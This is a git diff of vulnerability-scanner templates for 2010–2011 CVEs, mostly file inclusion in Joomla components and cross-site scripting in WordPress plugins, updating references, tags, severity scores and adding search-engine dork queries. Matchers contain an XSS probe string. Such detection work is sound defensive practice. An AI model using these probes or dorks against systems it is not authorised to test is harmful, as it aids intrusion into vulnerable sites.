-  remediation: Upgrade to a supported product version.
-  tags: cve,cve2010,iot,lfi,motorola
+  tags: cve2010,iot,lfi,motorola,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2507.yaml b/cves/2010/CVE-2010-2507.yaml
index c72a70e19b..9295c9f8a8 100644
--- a/cves/2010/CVE-2010-2507.yaml
+++ b/cves/2010/CVE-2010-2507.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/13981
     - https://www.cvedetails.com/cve/CVE-2010-2507
+    - http://web.archive.org/web/20140805070317/http://secunia.com/advisories/40297/
+    - http://packetstormsecurity.org/1006-exploits/joomlapicasa2gallery-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2507
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: edb,packetstorm,cve,cve2010,joomla,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2680.yaml b/cves/2010/CVE-2010-2680.yaml
index e68dd0d628..efd570ebde 100644
--- a/cves/2010/CVE-2010-2680.yaml
+++ b/cves/2010/CVE-2010-2680.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/14064
     - https://www.cvedetails.com/cve/CVE-2010-2680
+    - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt
+    - http://web.archive.org/web/20210121201853/https://www.securityfocus.com/bid/41163/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2680
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2682.yaml b/cves/2010/CVE-2010-2682.yaml
index 3b7ca7a83b..220e7b6f0b 100644
--- a/cves/2010/CVE-2010-2682.yaml
+++ b/cves/2010/CVE-2010-2682.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/14017
     - https://www.cvedetails.com/cve/CVE-2010-2682
+    - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt
+    - http://www.exploit-db.com/exploits/14017
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2682
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2857.yaml b/cves/2010/CVE-2010-2857.yaml
index d4ceca8e82..8a3d4029c1 100644
--- a/cves/2010/CVE-2010-2857.yaml
+++ b/cves/2010/CVE-2010-2857.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/14274
     - https://www.cvedetails.com/cve/CVE-2010-2857
+    - http://web.archive.org/web/20210121202225/https://www.securityfocus.com/bid/41485/
+    - http://www.exploit-db.com/exploits/14274
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2857
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2861.yaml b/cves/2010/CVE-2010-2861.yaml
index 3c01af7405..d7353ba7f1 100644
--- a/cves/2010/CVE-2010-2861.yaml
+++ b/cves/2010/CVE-2010-2861.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
     - http://www.adobe.com/support/security/bulletins/apsb10-18.html
+    - http://securityreason.com/securityalert/8148
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2861
-  remediation: Upgrade to a supported version.
   metadata:
     shodan-query: http.component:"Adobe ColdFusion"
-  tags: cve,cve2010,coldfusion,lfi,adobe
+  tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2918.yaml b/cves/2010/CVE-2010-2918.yaml
index caefc416bd..4f7592f7c1 100644
--- a/cves/2010/CVE-2010-2918.yaml
+++ b/cves/2010/CVE-2010-2918.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/31708
     - https://www.cvedetails.com/cve/CVE-2010-2918
+    - http://web.archive.org/web/20210127190100/https://www.securityfocus.com/bid/28942/
+    - https://www.exploit-db.com/exploits/14476
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2918
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: joomla,lfi,edb,cve,cve2010
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-2920.yaml b/cves/2010/CVE-2010-2920.yaml
index 9ba43cab77..6b9e2f8d92 100644
--- a/cves/2010/CVE-2010-2920.yaml
+++ b/cves/2010/CVE-2010-2920.yaml
@@ -8,10 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12120
     - https://www.cvedetails.com/cve/CVE-2010-2920
+    - http://www.vupen.com/english/advisories/2010/1844
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-2920
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-3203.yaml b/cves/2010/CVE-2010-3203.yaml
index 8ab1009b02..4f52723a40 100644
--- a/cves/2010/CVE-2010-3203.yaml
+++ b/cves/2010/CVE-2010-3203.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/14845
     - https://www.cvedetails.com/cve/CVE-2010-3203
+    - http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/
+    - http://www.exploit-db.com/exploits/14845
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-3203
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: edb,cve,cve2010,joomla,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-3426.yaml b/cves/2010/CVE-2010-3426.yaml
index be412616bf..ca28b72246 100644
--- a/cves/2010/CVE-2010-3426.yaml
+++ b/cves/2010/CVE-2010-3426.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/14964
     - https://www.cvedetails.com/cve/CVE-2010-3426
+    - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt
+    - http://www.exploit-db.com/exploits/14964
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-3426
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: lfi,edb,packetstorm,cve,cve2010,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-4231.yaml b/cves/2010/CVE-2010-4231.yaml
index d2b145bf0f..440d329e90 100644
--- a/cves/2010/CVE-2010-4231.yaml
+++ b/cves/2010/CVE-2010-4231.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2010-4231
     - https://www.exploit-db.com/exploits/15505
+    - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt
+    - http://www.exploit-db.com/exploits/15505/
+  remediation: Upgrade to a supported product version.
   classification:
     cve-id: CVE-2010-4231
-  remediation: Upgrade to a supported product version.
-  tags: cve,cve2010,iot,lfi,camera
+  tags: cve,cve2010,iot,lfi,camera,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-4239.yaml b/cves/2010/CVE-2010-4239.yaml
index 6f3303143c..c2b4d8c476 100644
--- a/cves/2010/CVE-2010-4239.yaml
+++ b/cves/2010/CVE-2010-4239.yaml
@@ -3,14 +3,16 @@ id: CVE-2010-4239
 info:
   name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion
   author: 0x_akoko
-  severity: high
-  description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion
+  severity: critical
+  description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability.
   reference:
     - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt
-    - https://www.cvedetails.com/cve/CVE-2010-4239
+    - https://www.openwall.com/lists/oss-security/2010/11/22/9
+    - https://security-tracker.debian.org/tracker/CVE-2010-4239
+    - https://nvd.nist.gov/vuln/detail/CVE-2010-4239
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.5
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2010-4239
     cwe-id: CWE-20
   tags: cve,cve2010,tikiwiki,lfi
@@ -28,3 +30,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2010/CVE-2010-4282.yaml b/cves/2010/CVE-2010-4282.yaml
index 0f9ef355fd..4e19e82b8b 100644
--- a/cves/2010/CVE-2010-4282.yaml
+++ b/cves/2010/CVE-2010-4282.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/15643
     - https://www.cvedetails.com/cve/CVE-2010-4282
+    - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
+    - http://www.exploit-db.com/exploits/15643
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-4282
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,lfi,joomla,phpshowtime
+  tags: phpshowtime,edb,cve,cve2010,lfi,joomla
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-4617.yaml b/cves/2010/CVE-2010-4617.yaml
index 8cfa8ebc38..36464505b2 100644
--- a/cves/2010/CVE-2010-4617.yaml
+++ b/cves/2010/CVE-2010-4617.yaml
@@ -8,10 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/15791
     - https://www.cvedetails.com/cve/CVE-2010-4617
+    - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-4617
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-4719.yaml b/cves/2010/CVE-2010-4719.yaml
index e07fc1fa1c..0e3cfa2a1e 100644
--- a/cves/2010/CVE-2010-4719.yaml
+++ b/cves/2010/CVE-2010-4719.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/15749
     - https://www.cvedetails.com/cve/CVE-2010-4719
+    - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt
+    - http://www.exploit-db.com/exploits/15749
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-4719
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-4769.yaml b/cves/2010/CVE-2010-4769.yaml
index 452cb9faae..247d5b55f4 100644
--- a/cves/2010/CVE-2010-4769.yaml
+++ b/cves/2010/CVE-2010-4769.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/15585
     - https://www.cvedetails.com/cve/CVE-2010-4769
+    - http://web.archive.org/web/20140803011658/http://secunia.com/advisories/42324/
+    - http://web.archive.org/web/20210121210048/https://www.securityfocus.com/bid/44992/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-4769
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-4977.yaml b/cves/2010/CVE-2010-4977.yaml
index 162f552fed..1da134d5db 100644
--- a/cves/2010/CVE-2010-4977.yaml
+++ b/cves/2010/CVE-2010-4977.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/34250
     - https://www.cvedetails.com/cve/CVE-2010-4977
+    - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt
+    - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-4977
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: joomla,lfi,edb,packetstorm,cve,cve2010
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-5028.yaml b/cves/2010/CVE-2010-5028.yaml
index 5a9d798fc5..89303e05b2 100644
--- a/cves/2010/CVE-2010-5028.yaml
+++ b/cves/2010/CVE-2010-5028.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/12601
     - https://www.cvedetails.com/cve/CVE-2010-5028
+    - http://www.vupen.com/english/advisories/2010/1269
+    - http://web.archive.org/web/20210126225410/https://www.securityfocus.com/bid/40193/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-5028
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-5278.yaml b/cves/2010/CVE-2010-5278.yaml
index da7888acbb..0c0531670c 100644
--- a/cves/2010/CVE-2010-5278.yaml
+++ b/cves/2010/CVE-2010-5278.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/34788
     - https://www.cvedetails.com/cve/CVE-2010-5278
+    - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt
+    - http://web.archive.org/web/20140803154716/http://secunia.com/advisories/41638/
   classification:
     cve-id: CVE-2010-5278
-  tags: cve,cve2010,lfi
+  tags: cve,cve2010,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-5286.yaml b/cves/2010/CVE-2010-5286.yaml
index 1523da3700..e5ee8dd902 100644
--- a/cves/2010/CVE-2010-5286.yaml
+++ b/cves/2010/CVE-2010-5286.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/34837
     - https://www.cvedetails.com/cve/CVE-2010-5286
+    - http://web.archive.org/web/20210123122507/https://www.securityfocus.com/bid/44053/
+    - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-5286
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2011/CVE-2011-0049.yaml b/cves/2011/CVE-2011-0049.yaml
index d9be2cda41..fd9c04a8a4 100644
--- a/cves/2011/CVE-2011-0049.yaml
+++ b/cves/2011/CVE-2011-0049.yaml
@@ -9,10 +9,11 @@ info:
     - https://www.exploit-db.com/exploits/16103
     - https://nvd.nist.gov/vuln/detail/CVE-2011-0063
     - http://www.kb.cert.org/vuls/id/363726
+    - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2011-0049
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2011,majordomo2,lfi
+  tags: cve,cve2011,majordomo2,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2011/CVE-2011-1669.yaml b/cves/2011/CVE-2011-1669.yaml
index 31619fa484..ff691f2ffc 100644
--- a/cves/2011/CVE-2011-1669.yaml
+++ b/cves/2011/CVE-2011-1669.yaml
@@ -8,10 +8,14 @@ info:
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
     - https://www.exploit-db.com/exploits/17119
+    - http://web.archive.org/web/20210121212348/https://www.securityfocus.com/bid/47146/
+    - http://www.exploit-db.com/exploits/17119
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2011-1669
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2011,wordpress,wp-plugin,lfi
+  metadata:
+    google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
+  tags: edb,cve,cve2011,wordpress,wp-plugin,lfi
 
 requests:
   - method: GET
diff --git a/cves/2011/CVE-2011-2744.yaml b/cves/2011/CVE-2011-2744.yaml
index d4ba7d6d90..06ffccf68d 100644
--- a/cves/2011/CVE-2011-2744.yaml
+++ b/cves/2011/CVE-2011-2744.yaml
@@ -7,10 +7,12 @@ info:
   description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
   reference:
     - https://www.exploit-db.com/exploits/35945
-    - https://www.cvedetails.com/cve/CVE-2011-2744
+    - http://www.openwall.com/lists/oss-security/2011/07/13/6
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-2744
+    - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
   classification:
     cve-id: CVE-2011-2744
-  tags: cve,cve2011,lfi,chyrp
+  tags: cve,cve2011,lfi,chyrp,edb
 
 requests:
   - method: GET
diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml
index 6b3715bb3b..ed1acfc80c 100644
--- a/cves/2011/CVE-2011-2780.yaml
+++ b/cves/2011/CVE-2011-2780.yaml
@@ -10,15 +10,14 @@ info:
     - http://www.openwall.com/lists/oss-security/2011/07/13/5
     - http://www.ocert.org/advisories/ocert-2011-001.html
     - http://www.openwall.com/lists/oss-security/2011/07/13/6
-    - http://www.securityfocus.com/bid/48672
-    - http://secunia.com/advisories/45184
-    - http://osvdb.org/73891
+    - http://web.archive.org/web/20210121214023/https://www.securityfocus.com/bid/48672/
+    - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
     - http://securityreason.com/securityalert/8312
     - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565
-    - http://www.securityfocus.com/archive/1/518890/100/0/threaded
+    - http://web.archive.org/web/20201207104106/https://www.securityfocus.com/archive/1/518890/100/0/threaded
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2011-2780
-  remediation: Upgrade to a supported version.
   tags: cve,cve2011,lfi,chyrp
 
 requests:
diff --git a/cves/2011/CVE-2011-3315.yaml b/cves/2011/CVE-2011-3315.yaml
index 0a70217e79..7406986eb6 100644
--- a/cves/2011/CVE-2011-3315.yaml
+++ b/cves/2011/CVE-2011-3315.yaml
@@ -4,15 +4,15 @@ info:
   name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
   author: daffainfo
   severity: high
-  description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express
-    (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers
-    to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
+  description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
   reference:
     - https://www.exploit-db.com/exploits/36256
+    - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx
+    - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2011-3315
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2011,lfi,cisco
+  tags: cve,cve2011,lfi,cisco,edb
 
 requests:
   - method: GET
diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml
index 43736129ab..e66d9aed23 100644
--- a/cves/2011/CVE-2011-4336.yaml
+++ b/cves/2011/CVE-2011-4336.yaml
@@ -7,15 +7,15 @@ info:
   description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-4336
-    - https://www.securityfocus.com/bid/48806/info
+    - http://web.archive.org/web/20210328232945/https://www.securityfocus.com/bid/48806/info
     - https://seclists.org/bugtraq/2011/Nov/140
+  remediation: Upgrade to a supported version.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2011-4336
     cwe-id: CWE-79
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2011,xss,tikiwiki
+  tags: seclists,cve,cve2011,xss,tikiwiki
 
 requests:
   - method: GET
diff --git a/cves/2011/CVE-2011-4618.yaml b/cves/2011/CVE-2011-4618.yaml
index bf551e83a6..ff441dcef2 100644
--- a/cves/2011/CVE-2011-4618.yaml
+++ b/cves/2011/CVE-2011-4618.yaml
@@ -1,15 +1,19 @@
 id: CVE-2011-4618
 
 info:
-  name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting
+  name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-4618
+    - http://web.archive.org/web/20210121070605/https://www.securityfocus.com/archive/1/520589
+    - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2011-4618
-  remediation: Upgrade to a supported version.
+  metadata:
+    google-query: inurl:"/wp-content/plugins/advanced-text-widget"
   tags: cve,cve2011,wordpress,xss,wp-plugin
 
 requests:
@@ -20,9 +24,9 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "</script><script>alert(document.domain)</script>"
-        part: body
 
       - type: word
         part: header
diff --git a/cves/2011/CVE-2011-4624.yaml b/cves/2011/CVE-2011-4624.yaml
index c9c03654bf..2df94565af 100644
--- a/cves/2011/CVE-2011-4624.yaml
+++ b/cves/2011/CVE-2011-4624.yaml
@@ -1,15 +1,19 @@
 id: CVE-2011-4624
 
 info:
-  name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting
+  name: GRAND FlAGallery 1.57 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-4624
+    - http://www.openwall.com/lists/oss-security/2011/12/23/2
+    - http://plugins.trac.wordpress.org/changeset/469785
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2011-4624
-  remediation: Upgrade to a supported version.
+  metadata:
+    google-query: inurl:"/wp-content/plugins/flash-album-gallery"
   tags: cve,cve2011,wordpress,xss,wp-plugin
 
 requests:
diff --git a/cves/2011/CVE-2011-4804.yaml b/cves/2011/CVE-2011-4804.yaml
index c29a71af73..5f1881d151 100644
--- a/cves/2011/CVE-2011-4804.yaml
+++ b/cves/2011/CVE-2011-4804.yaml
@@ -7,11 +7,13 @@ info:
   description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/36598
-    - https://www.cvedetails.com/cve/CVE-2011-4804
+    - http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/
+    - http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-4804
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2011-4804
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2011,joomla,lfi
+  tags: lfi,edb,cve,cve2011,joomla
 
 requests:
   - method: GET
diff --git a/cves/2011/CVE-2011-4926.yaml b/cves/2011/CVE-2011-4926.yaml
index 613926464b..decfdfeee6 100644
--- a/cves/2011/CVE-2011-4926.yaml
+++ b/cves/2011/CVE-2011-4926.yaml
@@ -1,15 +1,19 @@
 id: CVE-2011-4926
 
 info:
-  name: Adminimize 1.7.22 - Reflected Cross-Site Scripting
+  name: Adminimize 1.7.22 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-4926
     - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926
+    - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5
+    - http://www.openwall.com/lists/oss-security/2012/01/10/9
   classification:
     cve-id: CVE-2011-4926
+  metadata:
+    google-query: inurl:"/wp-content/plugins/adminimize/"
   tags: cve,cve2011,wordpress,xss,wp-plugin
 
 requests:
@@ -20,9 +24,9 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "</script><script>alert(document.domain)</script>"
-        part: body
 
       - type: word
         part: header
diff --git a/cves/2011/CVE-2011-5106.yaml b/cves/2011/CVE-2011-5106.yaml
index 6ffc85f1a1..031d518512 100644
--- a/cves/2011/CVE-2011-5106.yaml
+++ b/cves/2011/CVE-2011-5106.yaml
@@ -1,15 +1,19 @@
 id: CVE-2011-5106
 
 info:
-  name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting
+  name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-5106
     - https://wordpress.org/plugins/flexible-custom-post-type/#developers
+    - http://plugins.trac.wordpress.org/changeset?reponame=&new=466252%40flexible-custom-post-type&old=465583%40flexible-custom-post-type
+    - http://wordpress.org/extend/plugins/flexible-custom-post-type/changelog/
   classification:
     cve-id: CVE-2011-5106
+  metadata:
+    google-query: inurl:"/wp-content/plugins/flexible-custom-post-type/"
   tags: cve,cve2011,wordpress,xss,wp-plugin
 
 requests:
diff --git a/cves/2011/CVE-2011-5107.yaml b/cves/2011/CVE-2011-5107.yaml
index 612790ace8..12f1dd5f56 100644
--- a/cves/2011/CVE-2011-5107.yaml
+++ b/cves/2011/CVE-2011-5107.yaml
@@ -1,14 +1,19 @@
 id: CVE-2011-5107
 
 info:
-  name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting
+  name: Alert Before Your Post <= 0.1.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting  vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/
+    - http://web.archive.org/web/20210121220155/https://www.securityfocus.com/bid/50743/
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71413
+    - http://web.archive.org/web/20201208110708/https://www.securityfocus.com/archive/1/520590/100/0/threaded
   classification:
     cve-id: CVE-2011-5107
+  metadata:
+    google-query: inurl:"/wp-content/plugins/alert-before-your-post"
   tags: cve,cve2011,wordpress,xss,wp-plugin
 
 requests:
diff --git a/cves/2011/CVE-2011-5179.yaml b/cves/2011/CVE-2011-5179.yaml
index ac7a235b53..b5cb25da6d 100644
--- a/cves/2011/CVE-2011-5179.yaml
+++ b/cves/2011/CVE-2011-5179.yaml
@@ -1,14 +1,19 @@
 id: CVE-2011-5179
 
 info:
-  name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting
+  name: Skysa App Bar 1.04 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-5179
+    - http://web.archive.org/web/20210615122339/https://www.securityfocus.com/bid/50824
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486
+    - http://web.archive.org/web/20210614205347/https://www.securityfocus.com/archive/1/520662/100/0/threaded
   classification:
     cve-id: CVE-2011-5179
+  metadata:
+    google-query: inurl:"/wp-content/plugins/skysa-official/"
   tags: cve,cve2011,wordpress,xss,wp-plugin
 
 requests:
